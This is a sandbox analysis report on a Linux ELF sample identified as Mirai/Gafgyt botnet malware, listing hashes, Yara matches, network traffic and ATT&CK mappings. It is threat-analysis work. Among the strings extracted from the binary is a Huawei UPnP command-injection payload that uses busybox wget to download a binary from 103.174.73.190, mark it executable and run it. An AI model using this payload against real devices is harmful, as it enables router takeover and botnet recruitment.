Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
uycqnGcDJD.elf

Overview

General Information

Sample name:uycqnGcDJD.elf
renamed because original name is a hash value
Original sample name:a4e62f667819edc0c3d826522a9416d7.elf
Analysis ID:1428716
MD5:a4e62f667819edc0c3d826522a9416d7
SHA1:74f4f2615f9f8268565c7b7f23af4f462ca39ad4
SHA256:449f200f7a3c6c4452bdf1b6e475432e9e1c0330e3001c81b6c97d98c7cd746d
Tags:64elfgafgyt
Infos:

Detection

Mirai, Okiru
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Machine Learning detection for sample
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Analysis Advice

Exit code information suggests that the sample terminated abnormally, try to lookup the sample's target architecture.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1428716
Start date and time:2024-04-19 13:10:03 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:uycqnGcDJD.elf
renamed because original name is a hash value
Original Sample Name:a4e62f667819edc0c3d826522a9416d7.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@0/0
Command:/tmp/uycqnGcDJD.elf
PID:6228
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • uycqnGcDJD.elf (PID: 6228, Parent: 6148, MD5: a4e62f667819edc0c3d826522a9416d7) Arguments: /tmp/uycqnGcDJD.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
uycqnGcDJD.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    uycqnGcDJD.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
      uycqnGcDJD.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        uycqnGcDJD.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x190c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x190dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x190f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19104:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19118:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1912c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19140:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19154:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19168:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1917c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19190:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x191a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x191b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x191cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x191e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x191f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19208:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1921c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19230:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19244:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x19258:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        uycqnGcDJD.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
        • 0xf51c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
        Click to see the 6 entries
        SourceRuleDescriptionAuthorStrings
        6228.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
          6228.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
            6228.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6228.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0x190c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x190dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x190f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19104:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19118:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1912c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19140:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19154:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19168:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1917c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19190:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x191a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x191b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x191cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x191e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x191f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19208:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1921c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19230:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19244:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x19258:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              6228.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
              • 0xf51c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
              Click to see the 9 entries
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: uycqnGcDJD.elfAvira: detected
              Source: uycqnGcDJD.elfReversingLabs: Detection: 55%
              Source: uycqnGcDJD.elfVirustotal: Detection: 47%Perma Link
              Source: uycqnGcDJD.elfJoe Sandbox ML: detected
              Source: uycqnGcDJD.elfString: wgetcurl/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep/proc/proc/%d/cmdlineabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt3f
              Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
              Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
              Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: uycqnGcDJD.elfString found in binary or memory: http://103.174.73.190/tajma.mpsl;
              Source: uycqnGcDJD.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: uycqnGcDJD.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

              System Summary

              barindex
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_564b8eda Author: unknown
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_d18b3463 Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_564b8eda Author: unknown
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_d18b3463 Author: unknown
              Source: Process Memory Space: uycqnGcDJD.elf PID: 6228, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.174.73.190 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: /bin/busybox/
              Source: Initial sampleString containing 'busybox' found: /bin/busybox
              Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljneegay.armskyljneegay.arm5skyljneegay.arm6skyljneegay.arm7skyljneegay.mipsskyljneegay.mpslskyljneegay.x86_64skyljneegay.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.174.73.190 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exe/var/Challenge//app/hi3511/gmDVRibox/usr/dvr_main _8182T_1108/mnt/mtd/app/gui/var/Kylin/l0 c/udevd/var/tmp/sonia/hicorestm_hi3511_dvr/bin/busybox//usr/lib/systemd/systemd/shellsys/boot/media/srv/var/run/lib/etc/dev/home/Davinci/telnetsshwatchdog/var/spool//var/Sofia/sshd/usr/compress/bin//compress/bin/compress/usr/bashtelnetddropbearencodercundi/var/cundi//var/Condi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//usr/lib/systemd//system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server//opt/anko-app/ankosample _8182T_1104//usr/libexec/openssh/sftp-server/POST /goform/set_LimitClient_cfg HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: wgetcurl/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep/proc/proc/%d/cmdlineabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt3f
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_564b8eda reference_sample = ff04921d7bf9ca01ae33a9fc0743dce9ca250e42a33547c5665b1c9a0b5260ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 63a9e43902e7db0b7a20498b5a860e36201bacc407e9e336faca0b7cfbc37819, id = 564b8eda-6f0e-45b8-bef6-d61b0f090a36, last_modified = 2021-09-16
              Source: uycqnGcDJD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_d18b3463 reference_sample = cd86534d709877ec737ceb016b2a5889d2e3562ffa45a278bc615838c2e9ebc3, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4b3d3bb65db2cdb768d91c50928081780f206208e952c74f191d8bc481ce19c6, id = d18b3463-1b5e-49e1-9ae8-1d63a10a1ccc, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_564b8eda reference_sample = ff04921d7bf9ca01ae33a9fc0743dce9ca250e42a33547c5665b1c9a0b5260ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 63a9e43902e7db0b7a20498b5a860e36201bacc407e9e336faca0b7cfbc37819, id = 564b8eda-6f0e-45b8-bef6-d61b0f090a36, last_modified = 2021-09-16
              Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_d18b3463 reference_sample = cd86534d709877ec737ceb016b2a5889d2e3562ffa45a278bc615838c2e9ebc3, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4b3d3bb65db2cdb768d91c50928081780f206208e952c74f191d8bc481ce19c6, id = d18b3463-1b5e-49e1-9ae8-1d63a10a1ccc, last_modified = 2021-09-16
              Source: Process Memory Space: uycqnGcDJD.elf PID: 6228, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: classification engineClassification label: mal92.troj.linELF@0/0@0/0

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: uycqnGcDJD.elf, type: SAMPLE
              Source: Yara matchFile source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uycqnGcDJD.elf PID: 6228, type: MEMORYSTR
              Source: Yara matchFile source: uycqnGcDJD.elf, type: SAMPLE
              Source: Yara matchFile source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uycqnGcDJD.elf PID: 6228, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: uycqnGcDJD.elf, type: SAMPLE
              Source: Yara matchFile source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uycqnGcDJD.elf PID: 6228, type: MEMORYSTR
              Source: Yara matchFile source: uycqnGcDJD.elf, type: SAMPLE
              Source: Yara matchFile source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uycqnGcDJD.elf PID: 6228, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation1
              Scripting
              Path InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
              Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              No configs have been found
              SourceDetectionScannerLabelLink
              uycqnGcDJD.elf55%ReversingLabsLinux.Trojan.Gafgyt
              uycqnGcDJD.elf48%VirustotalBrowse
              uycqnGcDJD.elf100%AviraEXP/ELF.Mirai.Z.A
              uycqnGcDJD.elf100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://103.174.73.190/tajma.mpsl;uycqnGcDJD.elffalse
                unknown
                http://schemas.xmlsoap.org/soap/encoding/uycqnGcDJD.elffalse
                  high
                  http://schemas.xmlsoap.org/soap/envelope/uycqnGcDJD.elffalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    109.202.202.202
                    unknownSwitzerland
                    13030INIT7CHfalse
                    91.189.91.43
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    91.189.91.42
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
